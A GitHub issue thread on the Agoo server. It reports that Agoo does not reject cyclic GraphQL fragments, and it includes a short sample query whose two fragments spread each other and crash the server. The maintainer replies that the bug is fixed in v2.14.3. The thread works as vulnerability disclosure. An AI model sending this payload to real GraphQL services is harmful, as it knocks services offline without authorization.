Agoo Fragment Cycle Security Vulnerability

nicholasaleks commented 2 years ago

Agoo currently does not support request validations meaning cycle fragment requests lead to unbounded results causing instances of Agoo to crash.

Sample exploit script:

query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
    types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
    ...A
}

For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md

Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles

ohler55 commented 2 years ago

Fixed in v2.14.3.

ohler55 commented 2 years ago

It would have been nice to give me more than a day to fix the issue before submitting to the NVD. Just saying...

ohler55 / agoo

Agoo Fragment Cycle Security Vulnerability #109